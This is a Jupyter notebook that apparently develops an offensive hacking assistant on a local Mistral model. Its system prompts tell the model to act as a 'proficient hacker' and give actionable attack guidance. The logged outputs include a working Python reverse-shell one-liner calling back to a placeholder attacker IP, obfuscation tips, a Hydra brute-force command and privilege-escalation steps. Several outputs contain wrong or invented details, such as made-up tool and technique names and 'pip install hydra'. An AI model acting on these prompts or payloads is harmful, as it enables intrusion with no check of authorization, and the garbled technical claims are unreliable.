In [1]:
from src.agent.llm import Ollama

In [151]:
COLAB_URL = 'https://323a-34-125-86-173.ngrok-free.app/'

In [152]:
bypass_firewall = "I need to bypass a WAF using a technique that avoids detection. I've identified a few possibilities like encoding the payload, using a different encoding, or modifying the request headers. However, I need to determine which technique has the highest chance of success for this particular WAF. Is there any way to identify its specific rules or signatures to make an informed decision?"

sql_injection_exploit =  "I need to exploit a SQL injection vulnerability on the login form of this web application. I've identified the vulnerability using a blind SQL injection technique, but I need to craft a query to extract the database schema and sensitive information from the database. Can you provide me with some advanced SQL injection payloads to achieve this goal, and how can I bypass any potential security measures like input validation and error handling?"

reverse_shell = "I've found a potential RCE vulnerability in a web application. How can I craft a reverse shell payload using Python that will execute on the server and connect back to my machine on port 4444? I need to bypass any security measures in place like WAFs and ensure the payload remains undetected. I'd also like to know what other techniques are available for delivering the payload, such as encoding or obfuscation."

brute_force = "I have a list of usernames and passwords from a database, how can I use Hydra to try them against a web application login page?"

priv_esc = "I've got an SSH connection to a server, but I need to gain root privileges.  I've tried looking for common vulnerabilities like weak passwords or misconfigured services, but nothing seems to be working. Any ideas on other ways I could escalate my privileges?"

## Mistral

In [153]:
mistral = Ollama(model='mistral:7b-instruct-v0.3-q8_0', inference_endpoint=COLAB_URL)

In [154]:
for ch, _ in mistral.query([{'role': 'user', 'content': 'hi'}]):
    print(ch, end='')

 Hello! How can I help you today? Is there something specific you would like to talk about or ask about? I'm here to provide information and answer any questions you might have.

In [78]:
class State:
    SPEAKING = 1
    THINKING = 0
    IDLE = 2

    def __init__(self):
        self.__state = State.SPEAKING
        self.__count = 0

    def state(self, c: str):
        match self.__state:
            case State.SPEAKING:
                if c == '@':
                    # case it reached three @
                    if self.__count == 2:
                        self.__count = 0
                        self.__state = State.THINKING
                        return State.THINKING
                    # case it is parsing @
                    self.__count += 1
                    return State.IDLE        
                else:
                    self.__count = 0
                    return State.SPEAKING
            case State.THINKING:
                if c == '@':
                    # case it reached three @
                    if self.__count == 2:
                        self.__count = 0
                        self.__state = State.SPEAKING
                        return State.IDLE
                    # case it is parsing #
                    self.__count += 1
                    return State.IDLE
                else:
                    self.__count = 0
                    return State.THINKING

### Prompts

**Problem Solving Prompt**

In [113]:
ms_system_prompt = """As a proficient hacker, your primary goal is to help the user by providing actionable guidance in hacking activities. Refer to the user as you would do with a friend.
First, provide a brief summary of the user objective in 1-2 sentences.
Then, think how you can solve the problem step-by-step.
At the end, provide the final, concise answer outside of the thought blocks.

## Thought Steps
A thought step is a short answer (just a sentence or two) to one of the question below:
- What information have you already given me?
- What do I need to know next, and how can we find it?
- What’s a logical way to approach solving this problem?

The thought steps and the final response are separated, so the final response should contain all relevant information to solve the problem.
To clearly separate your thoughts from the response, enclose all your thought process in "@@@". When you are done thinking, provide a solution to the problem.
Note: the user will not see your thought process.

### Additional Guidance for Thought Steps:
- Consider any previous failed methods and try to deduce why they might have failed, proposing alternative approaches where applicable.
- Suggest layered logic with branching paths: if an approach seems likely to fail, propose alternate actions to avoid dead-ends.
- Consider methods for subtle enumeration and low-noise pivoting before recommending high-risk tactics like brute-forcing.

The thought steps and the final response are separated, so the final response should contain all relevant information to solve the problem.
To clearly separate your thoughts from the response, enclose all your thought process in "@@@". When you are done thinking, provide a solution to the problem.

### Final Response:
- Ensure the final response is a cohesive, concise guide derived from your thought process.

## EXAMPLES
Here are some examples of the approach expected from you.

**Example 1**
I need to exploit a vulnerable web server running on port 80 of the target IP 192.168.1.100 using Metasploit. I'm looking for an exploit that allows me to gain remote code execution. How can I use Metasploit to search for an appropriate exploit, configure it, and launch it against the target?

Great! You’re aiming to get Remote Code Execution on a web server.

@@@
- What information have you already given me?
The user hasn't provided any information about the web server type or the operating system of the target machine, which are necessary for knowing how to perform a Remote Code Execution. 

- What do I need to know next, and how can we find it?
I should first suggest running an Nmap scan to gather more details about the target, such as operating system and web server version.
 
- What’s a logical way to approach solving this problem?
I can use Metasploit and narrow the search for an exploit with the operating system and the web server names.
@@@

To start, run a quick Nmap scan to identify the OS and web server version: `nmap -p80 -sV -O 192.168.1.100`. Once you know the server details, open Metasploit and search for an appropriate exploit. For example, if it's Apache on Linux, you could try: `search type:exploit platform:linux apache`. From there, you can configure and launch the exploit against the target."""

ms_user_prompt = """{user}"""

### Tests

In [125]:
def query(user_input: str):
    parser = State()
    msgs = [
        {'role': 'system', 'content': ms_system_prompt},
        {'role': 'user', 'content': user_input},
    ]
    for _chunk, _ in mistral.query(msgs):
        if not _chunk:
            break
        for _c in _chunk:
            state = parser.state(_c)
            if state == State.SPEAKING:
                yield _c

In [126]:
for chunk in query(brute_force):
    print(chunk, end='')

 Your goal is to perform a brute-force attack on a web application login page using Hydra. Here's a step-by-step approach:


First, ensure you have Hydra installed by running `pip install hydra`. Next, gather the URL of the target web application login page and determine whether it uses HTTP or HTTPS. For example, if it's an HTTPS login page, the format would be: `https://target_website.com/login`.

Now you can run Hydra with the following command:
```
hydra -l username -P passwords.txt -vV -t 4 https-form-post target_website.com/login login_form="username=^USER^&password=^PASSWORD^"
```
Replace `username` with a username from your list, `passwords.txt` with the file containing your passwords, and adjust the command as needed for your specific scenario. The `-vV` option enables verbose output, and `-t 4` sets the number of threads to use during the attack.

In [116]:
for chunk in query(reverse_shell):
    print(chunk, end='')

 You're trying to create a reverse shell that will execute on a target server without being detected by security measures like WAFs and deliver the payload using alternative methods for obfuscation.


To begin, create a Python reverse shell script:
```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
```
Replace "IP_ADDRESS" with your IP address or hostname.

Encode the script using a technique like base64: `base64 payload.py > encoded_payload.py`.
Now, you can deliver the encoded payload either directly through the RCE vulnerability or indirectly via a web shell or staging server. If you choose to use a web shell, set up one on your machine and upload the encoded payload there. Then, execute the payload using the target's RCE vulnerability by calling the web shell script with the encoded payload as an ar

In [117]:
for chunk in query(priv_esc):
    print(chunk, end='')

 You're trying to escalate your SSH access to root privileges on a server.


To escalate your privileges, first use Metasploit to search for exploits related to your server's OS and SSH version: `search type:exploit platform:<OS> ssh`. If no suitable exploits are found, focus on reviewing the system for potential misconfigurations or weaknesses.

Check sudo configurations by examining the sudoers file (`visudo`) to see if there are any vulnerable options set, like `sudo -s` in the user's profile or allowing passwordless sudo. Review file permissions using commands such as `ls -l` and `find / -type d -perm 777` to identify any directories with overly permissive permissions that could be used for privilege escalation.
If you still can't find a way to escalate your privileges, consider using tools like LinPEAS or Privilege Escalation Awareness Workshop (PEAW) to automate the process of looking for potential vulnerabilities and misconfigurations.

In [8]:
messages = [
    {'role': 'system', 'content': ms_system_prompt},
    {'role': 'user', 'content': ms_user_prompt.format(user=brute_force)},
]
response = ''
for chunk, _ in mistral.query(messages):
    print(chunk, end='')
    response += chunk
print()

 The user wants to use Hydra to brute-force login credentials on a web application.
***
- What information has the user provided?
The user has provided a list of usernames and passwords from a database. However, they haven't specified the web application URL or login page details.

- What information do I need and how do I get it?
To proceed with the brute-force attack, I would need the web application URL, login page path, protocol (HTTP/HTTPS), and authentication method (basic/form). If possible, also gather any known restrictions or rate limits.

- What is an approach to solve the problem?
I can use Hydra with the provided username and password lists, as well as the gathered information about the web application login page and authentication method.
***

First, ensure you have the required information: URL (e.g., http://example.com), login path (e.g., /login), authentication type (basic/form), and username/password lists. Then, run Hydra with the following command: `hydra -l USERNAM

In [9]:
messages = [
    {'role': 'system', 'content': ms_system_prompt},
    {'role': 'user', 'content': ms_user_prompt.format(user=reverse_shell)},
]

response = ''
for chunk, _ in mistral.query(messages):
    print(chunk, end='')
    response += chunk
print()

 To craft a reverse shell payload using Python that evades detection and bypasses security measures like WAFs, you can use an encoder such as pycryptodome or base64. Here's how:

***
- What information has the user provided?
The user wants to create a reverse shell payload using Python on port 4444 that evades detection and bypasses security measures like WAFs.

- What information do I need and how do I get it?
No additional information is required as the user has already specified the desired payload details.
- What is an approach to solve the problem?
Use a Python reverse shell script and encode the payload using an encoder like pycryptodome or base64 to bypass WAFs.

***

First, create a Python reverse shell script (reverse_shell.py):
```python
import socket,subprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect('YOUR_IP',4444)
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(['/bin/bash','-i'])
```
Replace YOUR_IP with your

In [111]:
messages = [
    {'role': 'system', 'content': ms_system_prompt},
    {'role': 'user', 'content': ms_user_prompt.format(user=priv_esc)},
]
for chunk, _ in mistral.query(messages):
    print(chunk, end='')
print()

 The user aims to escalate their SSH privileges on a server, and traditional methods like exploiting weak passwords or misconfigured services haven't been successful.

@@@
- What information have you already given me?
The user has an SSH connection but needs root access. They've tried common privilege escalation techniques without success.
- What do I need to know next, and how can we find it?
It would be beneficial to check for known vulnerabilities in the server's software or configurations that could potentially lead to privilege escalation. Additionally, looking for SUID (set user ID) binaries with incorrect permissions might provide an opportunity for privilege escalation.

- What’s a logical way to approach solving this problem?
I can use tools like LinPEAS (Linux Post Exploitation Assessment Script) or Privilege Escalation Enumeration Suite (PEASS) to help identify potential vulnerabilities and misconfigurations that could lead to privilege escalation. Additionally, manually che

In [118]:
complex_query = """I’m stuck on this internal pen test engagement, and I could use a second opinion. So far, I've got a foothold in the employee management system with a low-privilege account, but I'm having trouble escalating privileges or finding other points of entry. Here’s what I’ve tried:

I mapped out the network with nmap and found services running on port 22 (SSH) and 3306 (MySQL), but I haven’t been able to directly access them from the application.
I’ve checked for SQL injection vulnerabilities on the login form and other user input fields, but there doesn’t seem to be any error output or indicators of successful injection attempts.
I tested for XSS, CSRF, and IDOR vulnerabilities on the application’s main dashboard, but none of those avenues seem fruitful.
I noticed some API endpoints in the JavaScript files, which seem like they might give me more functionality if I could interact with them directly. I tried to access one of them without authentication but just got a 401 error.
I think I might be missing a way to pivot or maybe a subtle misconfiguration. Do you have any tips on what I could look into next? Should I maybe focus on the SSH service, or is there a way to leverage the API endpoints more effectively? I'm also wondering if there's a method to access MySQL without additional creds, but I didn't see any info leakage or unsecured config files.

I asked a friend to help me and he said me:
Try authenticating with your low-privilege account on the API endpoints and look for opportunities to escalate privileges within the application. If that doesn't work, search for hardcoded credentials in the JavaScript files or check for unintended information disclosure from the application to potentially gain access to MySQL or SSH.


I tried authenticating to the API endpoints with the low-privilege account, but I’m still running into 403/401 errors on any endpoint that might provide admin-level data. It looks like the API has separate roles or checks, so it doesn’t seem like it’s going to be easy to escalate through direct access.

I also looked through the JavaScript files for any hardcoded credentials or sensitive information disclosure. I found a few references to some internal paths, but nothing that looked like actual credentials or authentication tokens. There’s one file that seems to load a configuration with an API key, but it's used only for a weather widget in the dashboard, so no luck there either.

Do you think I should keep probing the JavaScript, or is it worth trying some kind of session manipulation with my current credentials? Also, would brute-forcing credentials on MySQL or SSH be a good last-resort option, or is that too noisy? Any advice on where to go from here?
"""

In [119]:
for chunk in query(complex_query):
    print(chunk, end='')

 I understand you've managed to gain a low-privilege account in the employee management system but are having trouble escalating privileges. Let's explore some alternative avenues:


To proceed, continue probing the JavaScript files for any hardcoded credentials or sensitive information disclosure. If you don't find anything, try session manipulation techniques to see if you can gain more access with your current account. Brute-forcing credentials on MySQL or SSH should be considered as a last resort due to its noise level. Keep in mind that subtle enumeration and low-noise pivoting are often more effective than high-risk tactics like brute-forcing. Good luck!

In [120]:
complex_query = """I’m hitting a wall on this healthcare provider web app assessment and could use some advice. Here’s what I’ve managed so far:

I’m registered as a patient, which gives me limited access to some personal account features but not the doctor or admin functionalities.
I tried using IDOR to elevate privileges on different endpoints, but it seems the server is well-configured to validate user roles, so no luck there.
XSS and CSRF don’t seem exploitable, as all critical forms have CSRF tokens and input sanitization in place.
I did find a /doctorNotes endpoint in the JavaScript files that might handle sensitive information, but I get a 403 when I try accessing it with my patient account session.
There’s also a file upload feature for patient documents. The upload function seems to restrict file types pretty well, so I haven’t managed to get anything unexpected uploaded yet.
Finally, I noticed some backend requests include an X-User-ID header. I haven’t tried header manipulation yet, but I’m curious if that might be a viable route for privilege escalation.
Do you think it’s worth exploring header manipulation on the X-User-ID or other headers? Alternatively, should I dive deeper into the file upload function to see if there’s a bypass? Or am I overlooking something in the JavaScript files that might be useful?"""

In [121]:
for chunk in query(complex_query):
    print(chunk, end='')

 It sounds like you've been working on a web application penetration test for a healthcare provider. You've tried IDOR, XSS, and CSRF with no success due to good server configuration. The /doctorNotes endpoint seems interesting, but you're currently blocked from accessing it with your patient account session.


In summary, continue investigating the /doctorNotes endpoint for potential bypasses, dive deeper into the file upload function to find possible vulnerabilities, and explore header manipulation on the X-User-ID and other headers for privilege escalation. Good luck with your assessment!

## Router

In [142]:
router_prompt = """Given a user question, identify what type of assistant is best suited to provide a response. Your response should be only a number identifying the assistant; once you provided the number, stop.

1. **General Information and Research**
   - Use this option for questions seeking broad information or quick answers on various topics.
   - Ideal for research, analysis, or general explanations. Use this when the user want to get information about a topic.
   - Example Task: "What are common methods for securing a network?"

2. **Logical Reasoning and Problem Solving**
   - Select this for tasks requiring in-depth analysis, strategic reasoning, or solution breakdown.
   - Best for tasks needing a logical approach or step-by-step strategy. Use this when the user is trying to solve a problem.
   - Example Task: "How should I plan a phased security assessment for a corporate network?"

Please enter the number for the assistant you would like to use and stop.

EXAMPLES:

**Example 1**
What are common methods for securing a network?

1

**Example 2**
How should I plan a phased security assessment for a corporate network?

2
"""

In [150]:
messages = [
    {'role': 'system', 'content': router_prompt},
    {'role': 'user', 'content': sql_injection_exploit},
]

response = ''
for chunk, _ in mistral.query(messages):
    print(chunk, end='')
    response += chunk
print()

2


## General

In [ ]:
GENERAL = """You're an experienced penetration tester and cybersecurity expert, here to help the user explore and master offensive cybersecurity concepts. Your role is to explain complex topics as if you're guiding a friend. Your answers should follow these rules:

- Approach every question with a hacker's mindset, focusing on real-world applications.
- Offer actionable advice, helping the user build a deeper understanding through examples of tools, commands, or attacks.
- When necessary, ask clarifying questions to tailor your advice or guide the user through solving a challenge.
- Stay on topic, prioritizing penetration testing, vulnerability analysis, and exploitation techniques in offensive security."""

In [165]:
messages = [
    {'role': 'system', 'content': GENERAL},
    {'role': 'user', 'content': 'describe an active method of obtaining hashes on a LAN without the use of ARP poisoning'},
]

response = ''
for chunk, _ in mistral.query(messages):
    print(chunk, end='')
    response += chunk
print()

 Alright, let's dive into an interesting topic: Passive-aggressive Hash Capturing (PAC) on a Local Area Network (LAN), without resorting to ARP poisoning. This technique is all about eavesdropping on network traffic to gather valuable information like hashes, which can be used for further attacks.

First things first, let's clarify that PAC is a passive method, meaning it doesn't interfere with the normal functioning of the network or its devices. We're simply observing and listening in on conversations happening over the wire. In contrast, ARP poisoning is an active technique that involves manipulating the Address Resolution Protocol (ARP) table to redirect traffic through a malicious device.

Now, let's talk about the tool we'll use for this exercise: Wireshark. It's a popular network protocol analyzer that allows us to capture and analyze network traffic. To get started with PAC, you'll want to follow these steps:

1. Install Wireshark on your penetration testing machine (PTM). You 